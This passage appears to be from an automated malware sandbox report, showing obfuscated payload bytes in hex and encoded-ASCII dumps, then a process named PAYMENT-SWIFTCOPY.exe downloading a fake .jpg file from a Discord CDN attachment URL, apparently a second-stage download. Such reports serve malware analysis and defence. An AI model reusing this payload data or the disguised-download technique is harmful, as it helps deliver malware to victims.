                                                                                                2021-10-26 15:35:13 UTC4749INData Raw: 20 53 20 50 6e 20 53 20 54 54 67 20 53 20 69 4f 20 53 20 69 6e 20 53 20 50 6e 20 53 20 55 67 20 53 20 54 54 69 20 53 20 69 6e 20 53 20 50 6e 20 53 20 6e 4f 20 53 20 54 54 53 20 53 20 69 6e 20 53 20 50 70 20 53 20 54 4d 54 20 53 20 54 53 54 20 53 20 69 6e 20 53 20 50 70 20 53 20 54 54 67 20 53 20 4f 53 20 53 20 69 6e 20 53 20 50 70 20 53 20 55 6e 20 53 20 55 53 20 53 20 69 6e 20 53 20 50 70 20 53 20 55 6e 20 53 20 6e 6e 20 53 20 54 53 54 20 53 20 54 53 6e 20 53 20 54 53 69 20 53 20 70 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20
                                                                                                Data Ascii: S Pn S TTg S iO S in S Pn S Ug S TTi S in S Pn S nO S TTS S in S Pp S TMT S TST S in S Pp S TTg S OS S in S Pp S Un S US S in S Pp S Un S nn S TST S TSn S TSi S pO S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP
                                                                                                2021-10-26 15:35:13 UTC4765INData Raw: 20 54 54 50 20 53 20 54 4d 54 20 53 20 6e 69 20 53 20 70 50 20 53 20 6e 67 20 53 20 70 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 67 20 53 20 70 4f 20 53 20 70 50 20 53 20 69 6e 20 53 20 69 67 20 53 20 6e 4d 20 53 20 70 4f 20 53 20 69 6e 20 53 20 50 6e 20 53 20 54 4d 54 20 53 20 50 4d 20 53 20 69 6e 20 53 20 50 6e 20 53 20 54 54 67 20 53 20 50 53 20 53 20 54 53 55 20 53 20 69 4f 20 53 20 50 67 20 53 20 55 69 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53
                                                                                                Data Ascii: TTP S TMT S ni S pP S ng S pO S pP S pP S ng S pO S pP S in S ig S nM S pO S in S Pn S TMT S PM S in S Pn S TTg S PS S TSU S iO S Pg S Ui S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S
                                                                                                2021-10-26 15:35:13 UTC4781INData Raw: 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 6e 20 53 20 70 50 20 53 20 54 53 67 20 53 20 6e 67 20 53 20 70 50 20 53 20 70 50 20 53 20 54 54 4f 20 53 20 6e 6e 20 53 20 70 55 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 69 6e 20 53 20 54 54 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 69 6e 20 53 20 54 54 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 55 53 20 53 20 69 6e 20 53 20 69 6e 20 53 20 70 50 20 53 20 55 53 20 53 20 50 70 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 55 20 53 20 69 6e 20 53 20 70 50 20 53 20 55 53 20 53 20 50 70 20 53 20 70 50 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 70 20 53 20 70 50 20 53 20 70 50 20 53 20 55 53 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 54
                                                                                                Data Ascii: pP S pP S pP S pn S pP S TSg S ng S pP S pP S TTO S nn S pU S pP S pP S pP S pP S pP S in S TTO S pP S pP S in S TTO S pP S pP S pP S US S in S in S pP S US S Pp S pP S pP S pP S pU S in S pP S US S Pp S pP S in S in S Pp S pP S pP S US S in S in S in S T
                                                                                                2021-10-26 15:35:13 UTC4797INData Raw: 20 53 20 69 6e 20 53 20 69 4f 20 53 20 54 53 53 20 53 20 50 50 20 53 20 54 54 4f 20 53 20 69 6e 20 53 20 50 6e 20 53 20 55 53 20 53 20 55 6e 20 53 20 50 53 20 53 20 69 6e 20 53 20 69 67 20 53 20 54 53 70 20 53 20 54 53 67 20 53 20 54 54 4f 20 53 20 70 55 20 53 20 69 6e 20 53 20 6e 55 20 53 20 54 4d 54 20 53 20 54 54 50 20 53 20 6e 50 20 53 20 50 50 20 53 20 54 53 70 20 53 20 54 53 6e 20 53 20 54 4d 4d 20 53 20 70 70 20 53 20 55 4f 20 53 20 54 54 6e 20 53 20 54 53 6e 20 53 20 54 54 4d 20 53 20 54 54 67 20 53 20 6e 4d 20 53 20 69 6e 20 53 20 54 53 4d 20 53 20 55 4f 20 53 20 70 70 20 53 20 50 6e 20 53 20 69 6e 20 53 20 50 54 20 53 20 54 54 4d 20 53 20 50 6e 20 53 20 54 53 4d 20 53 20 55 53 20 53 20 50 6e 20 53 20 50 4d 20 53 20 54 53 54 20 53 20 54 54 53 20
                                                                                                Data Ascii: S in S iO S TSS S PP S TTO S in S Pn S US S Un S PS S in S ig S TSp S TSg S TTO S pU S in S nU S TMT S TTP S nP S PP S TSp S TSn S TMM S pp S UO S TTn S TSn S TTM S TTg S nM S in S TSM S UO S pp S Pn S in S PT S TTM S Pn S TSM S US S Pn S PM S TST S TTS
                                                                                                2021-10-26 15:35:13 UTC4813INData Raw: 50 20 53 20 69 6e 20 53 20 4f 53 20 53 20 70 4f 20 53 20 69 55 20 53 20 6e 67 20 53 20 50 6e 20 53 20 54 53 70 20 53 20 54 54 50 20 53 20 4f 53 20 53 20 6e 4d 20 53 20 50 6e 20 53 20 6e 6e 20 53 20 70 55 20 53 20 70 50 20 53 20 55 54 20 53 20 6e 53 20 53 20 55 70 20 53 20 54 53 6e 20 53 20 69 4f 20 53 20 55 67 20 53 20 70 50 20 53 20 69 6e 20 53 20 50 67 20 53 20 6e 69 20 53 20 55 69 20 53 20 54 53 67 20 53 20 54 53 4d 20 53 20 69 6e 20 53 20 6e 53 20 53 20 54 53 6e 20 53 20 50 67 20 53 20 55 53 20 53 20 69 6e 20 53 20 54 54 4f 20 53 20 4f 55 20 53 20 50 53 20 53 20 55 53 20 53 20 69 6e 20 53 20 50 70 20 53 20 6e 4d 20 53 20 6e 50 20 53 20 50 53 20 53 20 55 53 20 53 20 69 67 20 53 20 50 69 20 53 20 54 54 55 20 53 20 50 70 20 53 20 54 53 4d 20 53 20 69 6e
                                                                                                Data Ascii: P S in S OS S pO S iU S ng S Pn S TSp S TTP S OS S nM S Pn S nn S pU S pP S UT S nS S Up S TSn S iO S Ug S pP S in S Pg S ni S Ui S TSg S TSM S in S nS S TSn S Pg S US S in S TTO S OU S PS S US S in S Pp S nM S nP S PS S US S ig S Pi S TTU S Pp S TSM S in
                                                                                                2021-10-26 15:35:13 UTC4829INData Raw: 70 50 20 53 20 4f 55 20 53 20 70 50 20 53 20 70 70 20 53 20 69 4f 20 53 20 70 50 20 53 20 6e 4d 20 53 20 6e 6e 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 4f 20 53 20 54 53 4f 20 53 20 4f 4f 20 53 20 6e 69 20 53 20 54 53 67 20 53 20 70 70 20 53 20 55 54 20 53 20 70 50 20 53 20 6e 4d 20 53 20 6e 67 20 53 20 70 50 20 53 20 4f 55 20 53 20 54 54 4f 20 53 20 70 70 20 53 20 54 54 4f 20 53 20 70 50 20 53 20 6e 54 20 53 20 55 50 20 53 20 70 50 20 53 20 4f 4f 20 53 20 54 53 67 20 53 20 70 70 20 53 20 69 55 20 53 20 70 50 20 53 20 6e 54 20 53 20 54 53 6e 20 53 20 70 50 20 53 20 4f 53 20 53
                                                                                                Data Ascii: pP S OU S pP S pp S iO S pP S nM S nn S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pO S TSO S OO S ni S TSg S pp S UT S pP S nM S ng S pP S OU S TTO S pp S TTO S pP S nT S UP S pP S OO S TSg S pp S iU S pP S nT S TSn S pP S OS S
                                                                                                2021-10-26 15:35:13 UTC4845INData Raw: 6e 20 53 20 70 50 20 53 20 70 50 20 53 20 4f 53 20 53 20 54 53 67 20 53 20 70 70 20 53 20 69 4f 20 53 20 70 50 20 53 20 6e 54 20 53 20 54 54 4f 20 53 20 70 50 20 53 20 4f 55 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 67 20 53 20 70 50 20 53 20 6e 4d 20 53 20 70 50 20 53 20 70 50 20 53 20 55 4f 20 53 20 55 54 20 53 20 70 70 20 53 20 69 55 20 53 20 70 50 20 53 20 6e 54 20 53 20 54 53 67 20 53 20 70 50 20 53 20 6e 67 20 53 20 70 50 20 53 20 70 70 20 53 20 54 54 4d 20 53 20 70 50 20 53 20 6e 4d 20 53 20 6e 6e 20 53 20 70 50 20 53 20 6e 67 20 53 20 70 50 20 53 20 70 70 20 53 20 54 54 6e 20 53 20 70 50 20 53 20 6e 54 20 53 20 50 70 20 53 20 70 50 20 53 20 54 53 53 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 67 20 53 20 70 50 20 53 20 6e 4d 20 53 20 6e 6e 20
                                                                                                Data Ascii: n S pP S pP S OS S TSg S pp S iO S pP S nT S TTO S pP S OU S pP S pP S TSg S pP S nM S pP S pP S UO S UT S pp S iU S pP S nT S TSg S pP S ng S pP S pp S TTM S pP S nM S nn S pP S ng S pP S pp S TTn S pP S nT S Pp S pP S TSS S pP S pP S TSg S pP S nM S nn
                                                                                                2021-10-26 15:35:13 UTC4861INData Raw: 70 20 53 20 70 50 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 54 53 67 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 70 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 55 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 54 20 53 20 55 4f 20 53 20 70 50 20 53 20 54 54 4f 20 53 20 55 54 20 53 20 70 50 20 53 20 54 4d 54 20 53 20 70 50 20 53 20 70 50 20 53 20 50 4d 20 53 20 70 50 20 53 20 70 50 20 53 20 55 54 20 53 20 70 55 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 4d 20 53 20 70 50 20 53 20 70 50 20 53 20 55 69 20 53 20 54 54 4f 20 53 20 70 70 20 53 20 6e 70 20 53 20 70 50 20 53 20 70 50
                                                                                                Data Ascii: p S pP S in S in S in S TSg S UT S pP S pP S pP S pP S pP S pP S pP S pP S pP S pp S pP S pP S nU S UT S pP S pP S pP S pP S pP S nT S UO S pP S TTO S UT S pP S TMT S pP S pP S PM S pP S pP S UT S pU S in S in S PM S pP S pP S Ui S TTO S pp S np S pP S pP
                                                                                                2021-10-26 15:35:13 UTC4877INData Raw: 20 55 54 20 53 20 70 50 20 53 20 6e 67 20 53 20 70 50 20 53 20 70 50 20 53 20 69 55 20 53 20 70 50 20 53 20 70 6e 20 53 20 50 4d 20 53 20 70 50 20 53 20 6e 6e 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 67 20 53 20 70 50 20 53 20 6e 53 20 53 20 6e 6e 20 53 20 70 50 20 53 20 55 50 20 53 20 70 50 20 53 20 70 50 20 53 20 69 4f 20 53 20 70 50 20 53 20 6e 53 20 53 20 70 70 20 53 20 70 70 20 53 20 70 55 20 53 20 70 50 20 53 20 70 70 20 53 20 55 55 20 53 20 70 50 20 53 20 6e 54 20 53 20 54 53 6e 20 53 20 70 50 20 53 20 4f 55 20 53 20 54 53 67 20 53 20 70 70 20 53 20 54 53 6e 20 53 20 70 50 20 53 20 6e 54 20 53 20 50 70 20 53 20 70 50 20 53 20 54 53 53 20 53 20 54 54 4f 20 53 20 70 70 20 53 20 54 4d 4d 20 53 20 70 50 20 53 20 70 6e 20 53 20 70 50 20 53 20 70 50
                                                                                                Data Ascii: UT S pP S ng S pP S pP S iU S pP S pn S PM S pP S nn S pP S pP S TSg S pP S nS S nn S pP S UP S pP S pP S iO S pP S nS S pp S pp S pU S pP S pp S UU S pP S nT S TSn S pP S OU S TSg S pp S TSn S pP S nT S Pp S pP S TSS S TTO S pp S TMM S pP S pn S pP S pP
                                                                                                2021-10-26 15:35:13 UTC4893INData Raw: 54 53 50 20 53 20 6e 70 20 53 20 55 69 20 53 20 54 53 67 20 53 20 54 4d 4d 20 53 20 4f 53 20 53 20 70 55 20 53 20 70 70 20 53 20 54 53 4f 20 53 20 6e 55 20 53 20 54 53 4f 20 53 20 55 54 20 53 20 54 54 4f 20 53 20 4f 53 20 53 20 6e 54 20 53 20 70 4f 20 53 20 50 54 20 53 20 6e 4f 20 53 20 6e 4d 20 53 20 69 55 20 53 20 54 53 50 20 53 20 55 53 20 53 20 54 53 70 20 53 20 54 54 4f 20 53 20 54 54 55 20 53 20 4f 4f 20 53 20 50 54 20 53 20 55 70 20 53 20 54 54 4f 20 53 20 4f 4f 20 53 20 6e 54 20 53 20 50 6e 20 53 20 54 4d 54 20 53 20 54 53 53 20 53 20 6e 54 20 53 20 55 70 20 53 20 54 53 6e 20 53 20 55 69 20 53 20 69 4f 20 53 20 6e 6e 20 53 20 69 67 20 53 20 70 55 20 53 20 55 54 20 53 20 54 54 54 20 53 20 6e 69 20 53 20 70 6e 20 53 20 55 54 20 53 20 69 55 20 53 20
                                                                                                Data Ascii: TSP S np S Ui S TSg S TMM S OS S pU S pp S TSO S nU S TSO S UT S TTO S OS S nT S pO S PT S nO S nM S iU S TSP S US S TSp S TTO S TTU S OO S PT S Up S TTO S OO S nT S Pn S TMT S TSS S nT S Up S TSn S Ui S iO S nn S ig S pU S UT S TTT S ni S pn S UT S iU S
                                                                                                2021-10-26 15:35:13 UTC4909INData Raw: 20 53 20 70 55 20 53 20 70 4f 20 53 20 54 53 6e 20 53 20 6e 6e 20 53 20 70 6e 20 53 20 6e 67 20 53 20 6e 54 20 53 20 70 50 20 53 20 69 4f 20 53 20 55 50 20 53 20 70 4f 20 53 20 70 50 20 53 20 54 4d 53 20 53 20 6e 6e 20 53 20 4f 55 20 53 20 55 50 20 53 20 50 53 20 53 20 55 70 20 53 20 54 53 70 20 53 20 54 53 53 20 53 20 6e 54 20 53 20 54 53 55 20 53 20 54 54 53 20 53 20 4f 55 20 53 20 54 4d 54 20 53 20 70 70 20 53 20 55 67 20 53 20 55 50 20 53 20 69 55 20 53 20 70 4f 20 53 20 54 53 67 20 53 20 55 54 20 53 20 50 53 20 53 20 50 6e 20 53 20 54 53 6e 20 53 20 4f 53 20 53 20 55 67 20 53 20 70 70 20 53 20 55 69 20 53 20 4f 6e 20 53 20 55 6e 20 53 20 54 53 53 20 53 20 54 54 6e 20 53 20 4f 6e 20 53 20 55 6e 20 53 20 50 67 20 53 20 54 54 53 20 53 20 6e 67 20 53 20
                                                                                                Data Ascii: S pU S pO S TSn S nn S pn S ng S nT S pP S iO S UP S pO S pP S TMS S nn S OU S UP S PS S Up S TSp S TSS S nT S TSU S TTS S OU S TMT S pp S Ug S UP S iU S pO S TSg S UT S PS S Pn S TSn S OS S Ug S pp S Ui S On S Un S TSS S TTn S On S Un S Pg S TTS S ng S
                                                                                                2021-10-26 15:35:13 UTC4925INData Raw: 20 55 69 20 53 20 70 4f 20 53 20 50 67 20 53 20 6e 6e 20 53 20 70 55 20 53 20 55 50 20 53 20 54 54 4f 20 53 20 6e 6e 20 53 20 54 53 70 20 53 20 70 50 20 53 20 54 54 4f 20 53 20 6e 6e 20 53 20 70 55 20 53 20 70 50 20 53 20 54 54 4f 20 53 20 6e 6e 20 53 20 6e 53 20 53 20 54 54 54 20 53 20 55 55 20 53 20 70 55 20 53 20 55 69 20 53 20 6e 6e 20 53 20 54 54 4f 20 53 20 6e 6e 20 53 20 70 55 20 53 20 54 53 67 20 53 20 54 54 4f 20 53 20 6e 6e 20 53 20 55 69 20 53 20 6e 67 20 53 20 54 4d 4d 20 53 20 6e 55 20 53 20 55 69 20 53 20 54 53 6e 20 53 20 69 4f 20 53 20 6e 4f 20 53 20 55 70 20 53 20 54 54 54 20 53 20 54 54 4f 20 53 20 54 53 67 20 53 20 55 4f 20 53 20 55 54 20 53 20 54 4d 53 20 53 20 70 6e 20 53 20 54 4d 4d 20 53 20 70 50 20 53 20 6e 69 20 53 20 70 70 20 53
                                                                                                Data Ascii: Ui S pO S Pg S nn S pU S UP S TTO S nn S TSp S pP S TTO S nn S pU S pP S TTO S nn S nS S TTT S UU S pU S Ui S nn S TTO S nn S pU S TSg S TTO S nn S Ui S ng S TMM S nU S Ui S TSn S iO S nO S Up S TTT S TTO S TSg S UO S UT S TMS S pn S TMM S pP S ni S pp S
                                                                                                2021-10-26 15:35:13 UTC4941INData Raw: 4f 20 53 20 54 53 69 20 53 20 50 54 20 53 20 54 53 54 20 53 20 54 53 6e 20 53 20 6e 53 20 53 20 54 53 54 20 53 20 54 54 50 20 53 20 4f 53 20 53 20 55 70 20 53 20 54 53 4d 20 53 20 69 6e 20 53 20 55 54 20 53 20 6e 4f 20 53 20 55 70 20 53 20 55 54 20 53 20 54 54 70 20 53 20 6e 69 20 53 20 54 54 6e 20 53 20 50 67 20 53 20 6e 53 20 53 20 6e 54 20 53 20 54 53 70 20 53 20 54 54 4d 20 53 20 54 54 55 20 53 20 54 4d 4d 20 53 20 54 53 53 20 53 20 54 53 54 20 53 20 70 4f 20 53 20 50 70 20 53 20 6e 55 20 53 20 54 53 4d 20 53 20 54 54 4f 20 53 20 6e 50 20 53 20 6e 6e 20 53 20 55 70 20 53 20 55 53 20 53 20 4f 53 20 53 20 6e 67 20 53 20 6e 6e 20 53 20 70 6e 20 53 20 69 4f 20 53 20 55 53 20 53 20 54 54 55 20 53 20 54 53 50 20 53 20 50 54 20 53 20 54 54 55 20 53 20 6e 54
                                                                                                Data Ascii: O S TSi S PT S TST S TSn S nS S TST S TTP S OS S Up S TSM S in S UT S nO S Up S UT S TTp S ni S TTn S Pg S nS S nT S TSp S TTM S TTU S TMM S TSS S TST S pO S Pp S nU S TSM S TTO S nP S nn S Up S US S OS S ng S nn S pn S iO S US S TTU S TSP S PT S TTU S nT
                                                                                                2021-10-26 15:35:13 UTC4957INData Raw: 20 53 20 54 54 70 20 53 20 53 20 54 4f 4d 20 53 20 70 50 20 54 50 4f 20 70 69 20 53 20 67 6e 20 53 20 54 54 53 20 53 20 54 53 4f 20 53 20 4f 55 20 53 20 67 6e 20 53 20 54 53 54 20 53 20 67 6e 20 53 20 54 53 55 20 53 20 54 54 55 20 53 20 54 53 70 20 53 20 54 53 67 20 53 20 54 4d 53 20 53 20 54 53 4d 20 53 20 4f 4f 20 53 20 54 53 4f 20 53 20 67 6e 20 53 20 4f 4f 20 53 20 67 6e 20 53 20 54 54 67 20 53 20 4f 4f 20 53 20 54 53 6e 20 53 20 4f 55 20 53 20 54 53 53 20 53 20 54 4d 4d 20 53 20 54 54 4d 20 53 20 54 4d 4d 20 53 20 54 53 69 20 53 20 54 53 4d 20 53 20 54 53 70 20 53 20 54 54 67 20 53 20 67 6e 20 53 20 54 53 69 20 53 20 67 6e 20 53 20 4f 6e 20 53 20 54 54 53 20 53 20 4f 55 20 53 20 4f 6e 20 53 20 54 53 70 20 53 20 54 54 4d 20 53 20 54 54 54 20 53 20 54
                                                                                                Data Ascii: S TTp S S TOM S pP TPO pi S gn S TTS S TSO S OU S gn S TST S gn S TSU S TTU S TSp S TSg S TMS S TSM S OO S TSO S gn S OO S gn S TTg S OO S TSn S OU S TSS S TMM S TTM S TMM S TSi S TSM S TSp S TTg S gn S TSi S gn S On S TTS S OU S On S TSp S TTM S TTT S T
                                                                                                2021-10-26 15:35:13 UTC4973INData Raw: 54 53 20 53 20 4f 55 20 53 20 54 53 6e 20 53 20 54 53 4f 20 53 20 4f 6e 20 53 20 67 6e 20 53 20 54 54 50 20 53 20 67 6e 20 53 20 54 53 69 20 53 20 54 54 70 20 53 20 54 54 4d 20 53 20 67 6e 20 53 20 54 54 70 20 53 20 67 6e 20 53 20 54 53 4d 20 53 20 54 54 70 20 53 20 54 54 67 20 53 20 54 54 54 20 53 20 4f 4f 20 53 20 54 4d 54 20 53 20 54 54 55 20 53 20 67 6e 20 53 20 4f 6e 20 53 20 67 6e 20 53 20 54 54 54 20 53 20 54 54 55 20 53 20 4f 6e 20 53 20 54 53 54 20 53 20 54 53 50 20 53 20 67 6e 20 53 20 54 54 69 20 53 20 67 6e 20 53 20 54 53 53 20 53 20 4f 4f 20 53 20 4f 4f 20 53 20 54 53 54 20 53 20 54 4d 4d 20 53 20 4f 6e 20 53 20 4f 4f 20 53 20 4f 55 20 53 20 54 4d 4d 20 53 20 54 53 50 20 53 20 54 53 4f 20 53 20 54 53 55 20 53 20 54 54 4d 20 53 20 54 54 53 20
                                                                                                Data Ascii: TS S OU S TSn S TSO S On S gn S TTP S gn S TSi S TTp S TTM S gn S TTp S gn S TSM S TTp S TTg S TTT S OO S TMT S TTU S gn S On S gn S TTT S TTU S On S TST S TSP S gn S TTi S gn S TSS S OO S OO S TST S TMM S On S OO S OU S TMM S TSP S TSO S TSU S TTM S TTS
                                                                                                2021-10-26 15:35:13 UTC4989INData Raw: 53 20 54 53 54 20 53 20 67 6e 20 53 20 54 54 50 20 53 20 67 6e 20 53 20 54 53 67 20 53 20 54 53 50 20 53 20 54 54 4f 20 53 20 54 4d 54 20 53 20 4f 4f 20 53 20 54 53 55 20 53 20 67 6e 20 53 20 4f 4f 20 53 20 67 6e 20 53 20 54 54 69 20 53 20 54 53 54 20 53 20 54 4d 54 20 53 20 54 53 4f 20 53 20 54 53 67 20 53 20 4f 6e 20 53 20 54 4d 53 20 53 20 54 53 70 20 53 20 54 54 53 20 53 20 54 54 53 20 53 20 67 6e 20 53 20 67 4d 20 53 20 67 6e 20 53 20 54 54 70 20 53 20 54 53 67 20 53 20 54 54 50 20 53 20 67 6e 20 53 20 54 54 50 20 53 20 67 6e 20 53 20 54 53 55 20 53 20 54 54 54 20 53 20 54 54 70 20 53 20 54 54 53 20 53 20 54 53 6e 20 53 20 54 54 50 20 53 20 54 53 55 20 53 20 54 53 69 20 53 20 54 54 50 20 53 20 4f 4f 20 53 20 54 54 6e 20 53 20 54 53 53 20 53 20 67 6e
                                                                                                Data Ascii: S TST S gn S TTP S gn S TSg S TSP S TTO S TMT S OO S TSU S gn S OO S gn S TTi S TST S TMT S TSO S TSg S On S TMS S TSp S TTS S TTS S gn S gM S gn S TTp S TSg S TTP S gn S TTP S gn S TSU S TTT S TTp S TTS S TSn S TTP S TSU S TSi S TTP S OO S TTn S TSS S gn
                                                                                                2021-10-26 15:35:13 UTC5005INData Raw: 53 20 54 54 50 20 53 20 4f 4d 20 53 20 70 6e 20 53 20 54 54 6e 20 53 20 54 54 69 20 53 20 54 54 69 20 53 20 54 53 54 20 53 20 54 54 53 20 53 20 54 54 70 20 53 20 55 70 20 53 20 54 53 54 20 53 20 54 54 69 20 53 20 54 54 50 20 53 20 54 53 50 20 53 20 54 54 54 20 53 20 54 54 53 20 53 20 4f 4d 20 53 20 6e 55 20 53 20 54 54 54 20 53 20 54 54 70 20 53 20 54 53 50 20 53 20 54 53 4d 20 53 20 54 53 50 20 53 20 4f 4f 20 53 20 4f 6e 20 53 20 54 54 70 20 53 20 54 53 50 20 53 20 54 54 54 20 53 20 54 54 53 20 53 20 54 54 50 20 53 20 4f 4d 20 53 20 55 67 20 53 20 54 53 54 20 53 20 54 54 70 20 53 20 54 54 70 20 53 20 54 53 50 20 53 20 54 54 53 20 53 20 54 53 67 20 53 20 54 54 50 20 53 20 4f 4d 20 53 20 55 6e 20 53 20 54 53 50 20 53 20 54 54 53 20 53 20 54 53 53 20 53 20
                                                                                                Data Ascii: S TTP S OM S pn S TTn S TTi S TTi S TST S TTS S TTp S Up S TST S TTi S TTP S TSP S TTT S TTS S OM S nU S TTT S TTp S TSP S TSM S TSP S OO S On S TTp S TSP S TTT S TTS S TTP S OM S Ug S TST S TTp S TTp S TSP S TTS S TSg S TTP S OM S Un S TSP S TTS S TSS S
                                                                                                2021-10-26 15:35:13 UTC5021INData Raw: 20 54 6e 20 54 53 6e 20 53 20 54 53 54 20 53 20 54 54 69 20 53 20 54 54 53 20 53 20 54 53 54 20 53 20 54 53 55 20 53 20 50 54 20 53 20 50 53 20 53 20 53 20 69 67 20 55 6e 20 53 20 54 54 54 20 53 20 54 54 4f 20 53 20 50 69 20 53 20 50 4d 20 53 20 55 67 20 53 20 54 53 54 20 53 20 54 54 70 20 53 20 55 69 20 53 20 54 53 69 20 53 20 54 54 69 20 53 20 54 53 54 20 53 20 4f 6e 20 53 20 54 53 53 20 53 20 70 6e 20 53 20 54 54 54 20 53 20 54 54 53 20 53 20 54 54 70 20 53 20 54 53 54 20 53 20 54 4d 53 20 53 20 54 54 70 20 53 20 53 20 67 67 20 55 67 20 53 20 54 53 54 20 53 20 54 54 70 20 53 20 55 69 20 53 20 54 53 69 20 53 20 54 54 69 20 53 20 54 53 54 20 53 20 4f 6e 20 53 20 54 53 53 20 53 20 70 6e 20 53 20 54 54 54 20 53 20 54 54 53 20 53 20 54 54 70 20 53 20 54 53
                                                                                                Data Ascii: Tn TSn S TST S TTi S TTS S TST S TSU S PT S PS S S ig Un S TTT S TTO S Pi S PM S Ug S TST S TTp S Ui S TSi S TTi S TST S On S TSS S pn S TTT S TTS S TTp S TST S TMS S TTp S S gg Ug S TST S TTp S Ui S TSi S TTi S TST S On S TSS S pn S TTT S TTS S TTp S TS
                                                                                                2021-10-26 15:35:13 UTC5037INData Raw: 20 53 20 53 20 4d 67 4f 20 54 55 6e 20 54 4f 54 20 70 53 20 70 67 20 54 4d 53 20 54 53 4f 20 54 53 55 20 67 4d 20 54 54 55 20 54 53 54 20 54 54 69 20 54 54 50 20 54 53 50 20 54 54 54 20 54 54 53 20 70 54 20 67 69 20 69 4f 20 69 70 20 69 55 20 67 69 20 67 4d 20 54 53 54 20 54 54 53 20 4f 4f 20 54 54 54 20 54 53 53 20 54 53 50 20 54 54 53 20 54 53 67 20 70 54 20 67 69 20 55 50 20 55 69 20 6e 53 20 69 50 20 50 70 20 67 69 20 67 4d 20 54 54 50 20 54 54 70 20 4f 6e 20 54 54 53 20 54 53 53 20 4f 6e 20 54 53 55 20 54 54 54 20 54 54 53 20 54 53 54 20 70 54 20 67 69 20 54 4d 54 20 54 53 54 20 54 54 50 20 67 69 20 70 67 20 70 4d 20 54 67 20 54 53 20 54 67 20 54 53 20 70 53 20 4f 6e 20 54 54 50 20 54 54 50 20 54 53 54 20 54 53 4f 20 4f 55 20 54 53 55 20 54 4d 54 20
                                                                                                Data Ascii: S S MgO TUn TOT pS pg TMS TSO TSU gM TTU TST TTi TTP TSP TTT TTS pT gi iO ip iU gi gM TST TTS OO TTT TSS TSP TTS TSg pT gi UP Ui nS iP Pp gi gM TTP TTp On TTS TSS On TSU TTT TTS TST pT gi TMT TST TTP gi pg pM Tg TS Tg TS pS On TTP TTP TST TSO OU TSU TMT


                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                6192.168.2.549754162.159.130.233443C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe
                                                                                                TimestampkBytes transferredDirectionData
                                                                                                2021-10-26 15:35:14 UTC5040OUTGET /attachments/893177342426509335/902539094427578399/0CFA97D5.jpg HTTP/1.1
                                                                                                Host: cdn.discordapp.com
                                                                                                Connection: Keep-Alive
                                                                                                2021-10-26 15:35:14 UTC5040INHTTP/1.1 200 OK
                                                                                                Date: Tue, 26 Oct 2021 15:35:14 GMT
                                                                                                Content-Type: image/jpeg
                                                                                                Content-Length: 1023400
                                                                                                Connection: close
                                                                                                CF-Ray: 6a44c0d9bc7d5c38-FRA
                                                                                                Accept-Ranges: bytes
                                                                                                Age: 2125
                                                                                                Cache-Control: public, max-age=31536000
                                                                                                ETag: "d3cdbf4cf600f86ad718adfd07a223c2"
                                                                                                Expires: Wed, 26 Oct 2022 15:35:14 GMT
                                                                                                Last-Modified: Tue, 26 Oct 2021 12:48:08 GMT
                                                                                                Vary: Accept-Encoding
                                                                                                CF-Cache-Status: HIT
                                                                                                Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                Cf-Bgj: h2pri
                                                                                                Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                x-goog-generation: 1635252488534942
                                                                                                x-goog-hash: crc32c=wjkzZg==
                                                                                                x-goog-hash: md5=082/TPYA+GrXGK39B6Ijwg==
                                                                                                x-goog-metageneration: 1
                                                                                                x-goog-storage-class: STANDARD
                                                                                                x-goog-stored-content-encoding: identity
                                                                                                x-goog-stored-content-length: 1023400
